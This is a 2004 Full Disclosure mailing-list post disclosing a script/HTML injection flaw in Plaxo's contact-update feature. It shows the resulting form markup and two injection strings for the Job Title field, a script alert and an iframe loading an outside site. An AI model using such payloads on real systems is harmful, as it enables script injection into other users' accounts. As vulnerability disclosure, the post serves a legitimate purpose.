Full Disclosure mailing list archives
PLAXO: is that a cure or a disease?
From: "http-equiv () excite com" <1 () malware com>
Date: Fri, 12 Mar 2004 17:54:15 -0000
Friday, March 12, 2004 Having a firm belief in unnecessary gadgetry, we recently sent our most senior colleague Liu Die Yu a request to update his contact information via our plaxo device [http://www.plaxo.com/]. Checking back several hours later in our plaxo web account we eagerly selected his "card" to see what that update might be. BANG ! <input type="hidden" name="SetReplied" value=""> <input type="hidden" name="perm" value="1"> <input type="hidden" name="saveChanges" value="1"> <input type="hidden" name="close" value="0"> <input type="hidden" name="Biz.FullName" value="fatcat"> <input type="hidden" name="Biz.Title" value=""><iframe src=http://www.bloatedcorp.com>"> <input type="hidden" name="Biz.Email1" value="fatcat () bloatedcorp com"> <input type="hidden" name="Biz.Email2" value=""> <input type="hidden" name="Biz.Email3" value=""> <input type="hidden" name="Biz.IM" value=""> <input type="hidden" name="Biz.WebPage" value=""> He had taken our entire contact list for a joyride supreme. Trivial arbitrary code injection into the plaxo user web account. While it does a good job of attempting to defeat this, simple input in the recipient request for update field of "JOB TITLE", gives a real jobbing: "><SCRIPT>alert('boop')</SCRIPT> "><iframe src=http://www.bloatedcorp.com> Needless to say should you receive one of these irritating little requests, you'll now know what to do. End Call -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- PLAXO: is that a cure or a disease? http-equiv () excite com (Mar 12)